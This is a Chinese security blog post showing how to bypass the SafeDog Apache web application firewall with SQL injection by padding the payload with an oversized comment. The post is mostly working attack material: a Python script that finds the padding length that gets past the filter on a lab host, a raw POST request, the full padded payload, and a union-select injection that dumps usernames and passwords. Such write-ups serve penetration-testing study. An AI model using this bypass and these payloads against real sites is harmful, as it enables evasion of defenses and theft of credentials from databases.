SQL注入-安全狗apache3.5.12048版本超大数据包绕过
更新日期:2021.04.140x01 测试条件这个是get请求的,要求对方可以接收post请求,也就是说对方应该是request在发送请求的时候,要将bp的请求方式修改为post型将安全狗的cc防攻击功能关闭0x02 代码# -*- encoding: utf-8 -*-# Time : 2021/04/14 15:33:48# Author: crowimport requests'''POS
·
微信公众号:乌鸦安全
扫取二维码获取更多信息!
0x01 测试条件
- 这个是get请求的,要求对方可以接收post请求,也就是说对方应该是
request
- 在发送请求的时候,要将bp的请求方式修改为post型
- 将安全狗的cc防攻击功能关闭
0x02 代码
# -*- encoding: utf-8 -*-
# Time : 2021/04/14 15:33:48
# Author: crow
import requests
'''
POST http://10.211.55.9/Less-1/ HTTP/1.1
Host: 10.211.55.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
id=-1' /**/union select 1,2,3 --+
'''
url = 'http://10.211.55.9/Less-1/'
data = "id=-1' /**/ union select 1,2,3 --+"
headers = {
# "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0",
# 'Cookie': 'safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267'
'Host': '10.211.55.9',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'DNT':'1',
'Connection': 'close',
# 'Content-Length': '135',
'Cookie': 'safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '34',
}
# 4位的是从991开始就可以绕过
for i in range(991, 992):
m = '/*' + str('crow') * i + '*/'
# print(m)
data = "id=-1'" + m + "union select 1,2,database() --+"
res = requests.post(url, headers=headers, data=data).text
# print(res.text)
if 'qt-block-indent:0; text-indent' not in res:
print('[+] current userful payload length:', i)
else:
print('{} not userful'.format(i))
截图:4位字母从991开始就可以绕过了
991基础版:
/*crowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrow*/0x03 手动测试
继续测试:
group_concat(concat_ws(0x7e,username,password)) from security.users --+
成功
关注微信可以获取该版本安全狗安装包
微信公众号:乌鸦安全
扫取二维码获取更多信息!
永洪科技,致力于打造全球领先的数据技术厂商,具备从数据应用方案咨询、BI、AIGC智能分析、数字孪生、数据资产、数据治理、数据实施的端到端大数据价值服务能力。
更多推荐
0
0- 0
已为社区贡献1条内容
所有评论(0)